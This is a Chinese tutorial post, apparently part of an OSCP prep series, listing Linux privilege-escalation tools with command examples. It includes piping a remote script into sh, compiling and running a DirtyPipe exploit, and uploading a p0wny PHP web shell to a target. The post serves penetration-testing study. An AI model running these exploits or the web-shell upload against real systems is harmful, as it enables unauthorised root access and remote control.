本系列是《OSCP全维度通关特训辅导《OSCP必过18篇》》的番外篇,主要是拓展思路和视野,算是OSCP考试以外的知识,对于专心准备的同学可以重点学习《OSCP全维度通关特训辅导《OSCP必过18篇》》,本系列是课外参考哈

在Linux提权场景中,除了前文提到的LinPEAS、LSE、LinEnum等核心枚举工具,还有一批针对性强、场景适配性更高的工具,能覆盖自动化枚举、漏洞利用、权限分析等不同维度的提权需求。本文整理了10款高频实用的补充工具,附核心功能和使用要点,帮你全方位提升提权效率。
这类工具聚焦更细分的枚举场景,可作为LinPEAS等主力工具的补充,精准定位提权线索。
# 下载并运行(支持更多输出格式)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# 仅枚举容器相关提权线索
./linpeas.sh -c# 基础枚举
python3 PrivescCheck.py
# 输出JSON格式(便于后续分析)
python3 PrivescCheck.py -o json -f privesc_results.json# 克隆仓库并运行
git clone https://github.com/rasta-mouse/sherlock.git
cd sherlock
python3 sherlock.py --kernel $(uname -r)这类工具聚焦“找到漏洞后快速利用”,覆盖内核漏洞、配置漏洞等常见提权场景。
# 安装(Kali自带,其他系统需手动装)
sudo apt install exploitdb
# 搜索Linux内核漏洞
searchsploit linux kernel 5.4.0
# 查看利用代码详情
searchsploit -x linux/local/47168.c# 下载利用脚本
git clone https://github.com/AlexisAhmed/DirtyPipe-Exploit.git
cd DirtyPipe-Exploit
gcc dirtypipe.c -o dirtypipe
./dirtypipe# 上传p0wny-shell.php到Web根目录(如/var/www/html)
curl -X POST -F "file=@p0wny-shell.php" http://目标IP/upload.php
# 访问Web Shell:http://目标IP/p0wny-shell.php这类工具聚焦提权过程中的“动态监控”,捕捉易被静态枚举遗漏的提权线索。
# 跟踪指定进程(如cron进程)
strace -p $(pidof cron)
# 跟踪SUID程序的执行过程
strace ./suid_binary# 启用auditd
sudo systemctl start auditd
# 添加监控规则:监控所有SUID文件执行
sudo auditctl -a exit,always -F arch=b64 -S execve -F perm=x -F auid>=1000
# 查看审计日志
ausearch -k suid_exec# 查看root进程打开的所有文件
lsof -u root
# 查看指定端口对应的进程(发现隐藏服务)
lsof -i :8080# 查看当前进程的能力
capsh --print
# 检查指定进程的能力(如PID=1234)
getpcaps 1234这些补充工具覆盖了枚举、利用、分析等提权全流程,可根据目标系统的环境(如是否有网络、是否支持Python、内核版本)灵活选择,大幅提升提权成功率。